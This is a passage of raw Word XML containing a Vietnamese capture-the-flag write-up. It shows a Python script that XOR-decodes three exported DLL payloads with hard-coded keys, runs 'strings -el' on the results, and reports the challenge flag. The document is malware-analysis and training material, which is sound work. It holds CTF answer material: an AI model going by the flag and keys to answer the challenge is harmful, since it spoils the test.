        <w:t>Sau export, sử dụng script để XOR từng payload với key tương ứng lấy từ các biến `MMx`.</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1155CC" w14:textId="770A5370" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>from pathlib import Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13155DCF" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035"/>
    <w:p w14:paraId="35BC9ADA" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>pairs = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D7011" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>    "www1.dll": "6iIgloMk5iRYAw7ZTWed0CrjuZ9wijyQDjKO9Ms0D8K0Z2H5MX6wyOKqFxlOm1XpjmYfaQXacA6",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101111F9" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>    "www3.dll": "6iIWGoMk5iRYAw7ZTWed0CrjuZ9wijyQDjOL9Ms0D8K0Z2H5MX6wyOKqFxlOm1spjmYfaQXacA6",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB301B" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>    "www4.dll": "6iIoNoMk5iRYAw7ZTWed0CrjuZ9wijyQDjPy9Ms0D8K0Z2H5MX6wyOKqFxlOm1GpjmYfaQXacA6",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA173EB" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8DECE" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035"/>
    <w:p w14:paraId="5AB855E8" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>out_dir = Path("decoded")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC493A6" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>out_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>dir.mkdir</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t>(exist_ok=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61367F" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035"/>
    <w:p w14:paraId="48749541" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t xml:space="preserve">for name, key in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>pairs.items</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8EC6C4" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>    data = Path(name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>).read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6C131C" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t xml:space="preserve">    key = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>key.encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20260512" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035"/>
    <w:p w14:paraId="6D9D4C97" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t xml:space="preserve">    decoded = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t xml:space="preserve">b ^ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>key[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t>i % len(key)] for i, b in enumerate(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469040E1" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035"/>
    <w:p w14:paraId="2715D3AD" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>    out = out_dir / f"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>decrypt_{name}"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B6668D2" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>out.write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t>_bytes(decoded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CFF303" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035"/>
    <w:p w14:paraId="2EAAB92B" w14:textId="77777777" w:rsidR="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>    print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652035">
        <w:t>f"{out}"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652035">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C8F33E" w14:textId="77777777" w:rsidR="00BF3670" w:rsidRDefault="00BF3670" w:rsidP="00BF3670">
      <w:r w:rsidRPr="00BF3670">
        <w:t>Cuối cùng dùng `strings -a` chưa thấy chuỗi đặc biệt, nên thử tiếp `strings -el` để đọc chuỗi Unicode UTF-16LE trong DLL:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3670">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BF3670">
        <w:br/>
        <w:t>```bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3670">
        <w:br/>
        <w:t>strings -el decoded/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443BC644" w14:textId="64E9A693" w:rsidR="00BF3670" w:rsidRPr="00BF3670" w:rsidRDefault="00BF3670" w:rsidP="00BF3670">
      <w:r>
        <w:t xml:space="preserve">Kết quả thu được flag là </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF3670">
        <w:t>HTB{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF3670">
        <w:t>wH4tS_4_sQuirReLw4fFl3?}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81301D" w14:textId="734DCC65" w:rsidR="00BF3670" w:rsidRPr="00652035" w:rsidRDefault="00BF3670" w:rsidP="00652035">
      <w:r w:rsidRPr="00BF3670">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AA7384E" wp14:editId="1481329D">
            <wp:extent cx="5943600" cy="557530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3792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9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569D" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="002A1847" w:rsidRDefault="00652035" w:rsidP="002A1847"/>
    <w:p w14:paraId="60AB221F" w14:textId="77777777" w:rsidR="002A1847" w:rsidRDefault="002A1847" w:rsidP="000B1166"/>
    <w:p w14:paraId="114A85DA" w14:textId="77777777" w:rsidR="000B1166" w:rsidRPr="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166"/>
    <w:p w14:paraId="52454799" w14:textId="77777777" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166"/>
    <w:sectPr w:rsidR="000B1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0D"/>
    <w:rsid w:val="0000031F"/>
    <w:rsid w:val="000B1166"/>
    <w:rsid w:val="00190A0E"/>
    <w:rsid w:val="002057BC"/>
    <w:rsid w:val="002A1847"/>
    <w:rsid w:val="00326F60"/>
    <w:rsid w:val="00396CA3"/>
    <w:rsid w:val="003B7C11"/>
    <w:rsid w:val="003E5679"/>
    <w:rsid w:val="00652035"/>
    <w:rsid w:val="006B290D"/>
    <w:rsid w:val="00731448"/>
    <w:rsid w:val="008579A2"/>
    <w:rsid w:val="008800F1"/>
    <w:rsid w:val="00BF3670"/>
    <w:rsid w:val="00E2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D0E2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7ABF0CC6-EC31-4A82-9E9A-10BE1FE9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Dương</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Trần Minh Dương</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-02T08:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-02T09:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>